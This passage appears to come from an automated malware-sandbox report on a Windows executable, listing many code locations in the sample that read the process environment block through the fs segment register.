          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176002D mov eax, dword ptr fs:[00000030h]3_2_0176002D
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176002D mov eax, dword ptr fs:[00000030h]3_2_0176002D
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174B02A mov eax, dword ptr fs:[00000030h]3_2_0174B02A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174B02A mov eax, dword ptr fs:[00000030h]3_2_0174B02A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174B02A mov eax, dword ptr fs:[00000030h]3_2_0174B02A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174B02A mov eax, dword ptr fs:[00000030h]3_2_0174B02A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B7016 mov eax, dword ptr fs:[00000030h]3_2_017B7016
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B7016 mov eax, dword ptr fs:[00000030h]3_2_017B7016
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B7016 mov eax, dword ptr fs:[00000030h]3_2_017B7016
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017340E1 mov eax, dword ptr fs:[00000030h]3_2_017340E1
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017340E1 mov eax, dword ptr fs:[00000030h]3_2_017340E1
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017340E1 mov eax, dword ptr fs:[00000030h]3_2_017340E1
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01804015 mov eax, dword ptr fs:[00000030h]3_2_01804015
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01804015 mov eax, dword ptr fs:[00000030h]3_2_01804015
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017358EC mov eax, dword ptr fs:[00000030h]3_2_017358EC
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017CB8D0 mov eax, dword ptr fs:[00000030h]3_2_017CB8D0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017CB8D0 mov ecx, dword ptr fs:[00000030h]3_2_017CB8D0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017CB8D0 mov eax, dword ptr fs:[00000030h]3_2_017CB8D0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017CB8D0 mov eax, dword ptr fs:[00000030h]3_2_017CB8D0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017CB8D0 mov eax, dword ptr fs:[00000030h]3_2_017CB8D0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017CB8D0 mov eax, dword ptr fs:[00000030h]3_2_017CB8D0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176F0BF mov ecx, dword ptr fs:[00000030h]3_2_0176F0BF
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176F0BF mov eax, dword ptr fs:[00000030h]3_2_0176F0BF
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176F0BF mov eax, dword ptr fs:[00000030h]3_2_0176F0BF
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017620A0 mov eax, dword ptr fs:[00000030h]3_2_017620A0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017620A0 mov eax, dword ptr fs:[00000030h]3_2_017620A0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017620A0 mov eax, dword ptr fs:[00000030h]3_2_017620A0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017620A0 mov eax, dword ptr fs:[00000030h]3_2_017620A0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017620A0 mov eax, dword ptr fs:[00000030h]3_2_017620A0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017620A0 mov eax, dword ptr fs:[00000030h]3_2_017620A0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017790AF mov eax, dword ptr fs:[00000030h]3_2_017790AF
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01739080 mov eax, dword ptr fs:[00000030h]3_2_01739080
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01801074 mov eax, dword ptr fs:[00000030h]3_2_01801074
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B3884 mov eax, dword ptr fs:[00000030h]3_2_017B3884
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B3884 mov eax, dword ptr fs:[00000030h]3_2_017B3884
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01763B7A mov eax, dword ptr fs:[00000030h]3_2_01763B7A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01763B7A mov eax, dword ptr fs:[00000030h]3_2_01763B7A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173DB60 mov ecx, dword ptr fs:[00000030h]3_2_0173DB60
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01805BA5 mov eax, dword ptr fs:[00000030h]3_2_01805BA5
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173F358 mov eax, dword ptr fs:[00000030h]3_2_0173F358
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173DB40 mov eax, dword ptr fs:[00000030h]3_2_0173DB40
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F131B mov eax, dword ptr fs:[00000030h]3_2_017F131B
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017603E2 mov eax, dword ptr fs:[00000030h]3_2_017603E2
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017603E2 mov eax, dword ptr fs:[00000030h]3_2_017603E2
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017603E2 mov eax, dword ptr fs:[00000030h]3_2_017603E2
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017603E2 mov eax, dword ptr fs:[00000030h]3_2_017603E2
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017603E2 mov eax, dword ptr fs:[00000030h]3_2_017603E2
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017603E2 mov eax, dword ptr fs:[00000030h]3_2_017603E2
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175DBE9 mov eax, dword ptr fs:[00000030h]3_2_0175DBE9
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B53CA mov eax, dword ptr fs:[00000030h]3_2_017B53CA
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B53CA mov eax, dword ptr fs:[00000030h]3_2_017B53CA
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01808B58 mov eax, dword ptr fs:[00000030h]3_2_01808B58
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01764BAD mov eax, dword ptr fs:[00000030h]3_2_01764BAD
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01764BAD mov eax, dword ptr fs:[00000030h]3_2_01764BAD
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01764BAD mov eax, dword ptr fs:[00000030h]3_2_01764BAD
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01762397 mov eax, dword ptr fs:[00000030h]3_2_01762397
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176B390 mov eax, dword ptr fs:[00000030h]3_2_0176B390
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F138A mov eax, dword ptr fs:[00000030h]3_2_017F138A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01741B8F mov eax, dword ptr fs:[00000030h]3_2_01741B8F
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01741B8F mov eax, dword ptr fs:[00000030h]3_2_01741B8F
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017ED380 mov ecx, dword ptr fs:[00000030h]3_2_017ED380
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0177927A mov eax, dword ptr fs:[00000030h]3_2_0177927A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017EB260 mov eax, dword ptr fs:[00000030h]3_2_017EB260
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017EB260 mov eax, dword ptr fs:[00000030h]3_2_017EB260
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FEA55 mov eax, dword ptr fs:[00000030h]3_2_017FEA55
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017C4257 mov eax, dword ptr fs:[00000030h]3_2_017C4257
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01739240 mov eax, dword ptr fs:[00000030h]3_2_01739240
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01739240 mov eax, dword ptr fs:[00000030h]3_2_01739240
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01739240 mov eax, dword ptr fs:[00000030h]3_2_01739240
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01739240 mov eax, dword ptr fs:[00000030h]3_2_01739240
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01774A2C mov eax, dword ptr fs:[00000030h]3_2_01774A2C
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01774A2C mov eax, dword ptr fs:[00000030h]3_2_01774A2C
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01735210 mov eax, dword ptr fs:[00000030h]3_2_01735210
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01735210 mov ecx, dword ptr fs:[00000030h]3_2_01735210
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01735210 mov eax, dword ptr fs:[00000030h]3_2_01735210
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01735210 mov eax, dword ptr fs:[00000030h]3_2_01735210
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173AA16 mov eax, dword ptr fs:[00000030h]3_2_0173AA16
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173AA16 mov eax, dword ptr fs:[00000030h]3_2_0173AA16
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01753A1C mov eax, dword ptr fs:[00000030h]3_2_01753A1C
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FAA16 mov eax, dword ptr fs:[00000030h]3_2_017FAA16
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FAA16 mov eax, dword ptr fs:[00000030h]3_2_017FAA16
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01748A0A mov eax, dword ptr fs:[00000030h]3_2_01748A0A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01762AE4 mov eax, dword ptr fs:[00000030h]3_2_01762AE4
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01762ACB mov eax, dword ptr fs:[00000030h]3_2_01762ACB
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174AAB0 mov eax, dword ptr fs:[00000030h]3_2_0174AAB0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174AAB0 mov eax, dword ptr fs:[00000030h]3_2_0174AAB0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176FAB0 mov eax, dword ptr fs:[00000030h]3_2_0176FAB0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017352A5 mov eax, dword ptr fs:[00000030h]3_2_017352A5
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017352A5 mov eax, dword ptr fs:[00000030h]3_2_017352A5
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017352A5 mov eax, dword ptr fs:[00000030h]3_2_017352A5
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017352A5 mov eax, dword ptr fs:[00000030h]3_2_017352A5
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017352A5 mov eax, dword ptr fs:[00000030h]3_2_017352A5
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176D294 mov eax, dword ptr fs:[00000030h]3_2_0176D294
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176D294 mov eax, dword ptr fs:[00000030h]3_2_0176D294
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01808A62 mov eax, dword ptr fs:[00000030h]3_2_01808A62
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175C577 mov eax, dword ptr fs:[00000030h]3_2_0175C577
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175C577 mov eax, dword ptr fs:[00000030h]3_2_0175C577
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01757D50 mov eax, dword ptr fs:[00000030h]3_2_01757D50
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_018005AC mov eax, dword ptr fs:[00000030h]3_2_018005AC
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_018005AC mov eax, dword ptr fs:[00000030h]3_2_018005AC
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01773D43 mov eax, dword ptr fs:[00000030h]3_2_01773D43
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B3540 mov eax, dword ptr fs:[00000030h]3_2_017B3540
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017E3D40 mov eax, dword ptr fs:[00000030h]3_2_017E3D40
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]3_2_01743D34
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]3_2_01743D34
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]3_2_01743D34
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]3_2_01743D34
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]3_2_01743D34
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]3_2_01743D34
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]3_2_01743D34
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]3_2_01743D34
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]3_2_01743D34
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]3_2_01743D34
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]3_2_01743D34
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]3_2_01743D34
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01743D34 mov eax, dword ptr fs:[00000030h]3_2_01743D34
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173AD30 mov eax, dword ptr fs:[00000030h]3_2_0173AD30
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FE539 mov eax, dword ptr fs:[00000030h]3_2_017FE539
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017BA537 mov eax, dword ptr fs:[00000030h]3_2_017BA537
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01764D3B mov eax, dword ptr fs:[00000030h]3_2_01764D3B
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01764D3B mov eax, dword ptr fs:[00000030h]3_2_01764D3B
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01764D3B mov eax, dword ptr fs:[00000030h]3_2_01764D3B
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017E8DF1 mov eax, dword ptr fs:[00000030h]3_2_017E8DF1
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174D5E0 mov eax, dword ptr fs:[00000030h]3_2_0174D5E0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174D5E0 mov eax, dword ptr fs:[00000030h]3_2_0174D5E0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FFDE2 mov eax, dword ptr fs:[00000030h]3_2_017FFDE2
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FFDE2 mov eax, dword ptr fs:[00000030h]3_2_017FFDE2
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FFDE2 mov eax, dword ptr fs:[00000030h]3_2_017FFDE2
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FFDE2 mov eax, dword ptr fs:[00000030h]3_2_017FFDE2
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6DC9 mov eax, dword ptr fs:[00000030h]3_2_017B6DC9
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6DC9 mov eax, dword ptr fs:[00000030h]3_2_017B6DC9
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6DC9 mov eax, dword ptr fs:[00000030h]3_2_017B6DC9
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6DC9 mov ecx, dword ptr fs:[00000030h]3_2_017B6DC9
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6DC9 mov eax, dword ptr fs:[00000030h]3_2_017B6DC9
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6DC9 mov eax, dword ptr fs:[00000030h]3_2_017B6DC9
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01808D34 mov eax, dword ptr fs:[00000030h]3_2_01808D34
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01761DB5 mov eax, dword ptr fs:[00000030h]3_2_01761DB5
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01761DB5 mov eax, dword ptr fs:[00000030h]3_2_01761DB5
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01761DB5 mov eax, dword ptr fs:[00000030h]3_2_01761DB5
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017635A1 mov eax, dword ptr fs:[00000030h]3_2_017635A1
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176FD9B mov eax, dword ptr fs:[00000030h]3_2_0176FD9B
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176FD9B mov eax, dword ptr fs:[00000030h]3_2_0176FD9B
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01762581 mov eax, dword ptr fs:[00000030h]3_2_01762581
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01762581 mov eax, dword ptr fs:[00000030h]3_2_01762581
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01762581 mov eax, dword ptr fs:[00000030h]3_2_01762581
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01762581 mov eax, dword ptr fs:[00000030h]3_2_01762581
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01732D8A mov eax, dword ptr fs:[00000030h]3_2_01732D8A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01732D8A mov eax, dword ptr fs:[00000030h]3_2_01732D8A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01732D8A mov eax, dword ptr fs:[00000030h]3_2_01732D8A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01732D8A mov eax, dword ptr fs:[00000030h]3_2_01732D8A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01732D8A mov eax, dword ptr fs:[00000030h]3_2_01732D8A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175746D mov eax, dword ptr fs:[00000030h]3_2_0175746D
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017CC450 mov eax, dword ptr fs:[00000030h]3_2_017CC450
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017CC450 mov eax, dword ptr fs:[00000030h]3_2_017CC450
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176A44B mov eax, dword ptr fs:[00000030h]3_2_0176A44B
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01808CD6 mov eax, dword ptr fs:[00000030h]3_2_01808CD6
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176BC2C mov eax, dword ptr fs:[00000030h]3_2_0176BC2C
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6C0A mov eax, dword ptr fs:[00000030h]3_2_017B6C0A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6C0A mov eax, dword ptr fs:[00000030h]3_2_017B6C0A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6C0A mov eax, dword ptr fs:[00000030h]3_2_017B6C0A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6C0A mov eax, dword ptr fs:[00000030h]3_2_017B6C0A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]3_2_017F1C06
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]3_2_017F1C06
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]3_2_017F1C06
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]3_2_017F1C06
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]3_2_017F1C06
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]3_2_017F1C06
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]3_2_017F1C06
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]3_2_017F1C06
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]3_2_017F1C06
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]3_2_017F1C06
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]3_2_017F1C06
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]3_2_017F1C06
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]3_2_017F1C06
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1C06 mov eax, dword ptr fs:[00000030h]3_2_017F1C06
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F14FB mov eax, dword ptr fs:[00000030h]3_2_017F14FB
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6CF0 mov eax, dword ptr fs:[00000030h]3_2_017B6CF0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6CF0 mov eax, dword ptr fs:[00000030h]3_2_017B6CF0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B6CF0 mov eax, dword ptr fs:[00000030h]3_2_017B6CF0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0180740D mov eax, dword ptr fs:[00000030h]3_2_0180740D
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0180740D mov eax, dword ptr fs:[00000030h]3_2_0180740D
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0180740D mov eax, dword ptr fs:[00000030h]3_2_0180740D
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174849B mov eax, dword ptr fs:[00000030h]3_2_0174849B
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174FF60 mov eax, dword ptr fs:[00000030h]3_2_0174FF60
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0174EF40 mov eax, dword ptr fs:[00000030h]3_2_0174EF40
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176E730 mov eax, dword ptr fs:[00000030h]3_2_0176E730
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01734F2E mov eax, dword ptr fs:[00000030h]3_2_01734F2E
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01734F2E mov eax, dword ptr fs:[00000030h]3_2_01734F2E
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175F716 mov eax, dword ptr fs:[00000030h]3_2_0175F716
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017CFF10 mov eax, dword ptr fs:[00000030h]3_2_017CFF10
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017CFF10 mov eax, dword ptr fs:[00000030h]3_2_017CFF10
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176A70E mov eax, dword ptr fs:[00000030h]3_2_0176A70E
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176A70E mov eax, dword ptr fs:[00000030h]3_2_0176A70E
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017737F5 mov eax, dword ptr fs:[00000030h]3_2_017737F5
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0180070D mov eax, dword ptr fs:[00000030h]3_2_0180070D
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0180070D mov eax, dword ptr fs:[00000030h]3_2_0180070D
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01748794 mov eax, dword ptr fs:[00000030h]3_2_01748794
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01808F6A mov eax, dword ptr fs:[00000030h]3_2_01808F6A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B7794 mov eax, dword ptr fs:[00000030h]3_2_017B7794
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B7794 mov eax, dword ptr fs:[00000030h]3_2_017B7794
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B7794 mov eax, dword ptr fs:[00000030h]3_2_017B7794
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175AE73 mov eax, dword ptr fs:[00000030h]3_2_0175AE73
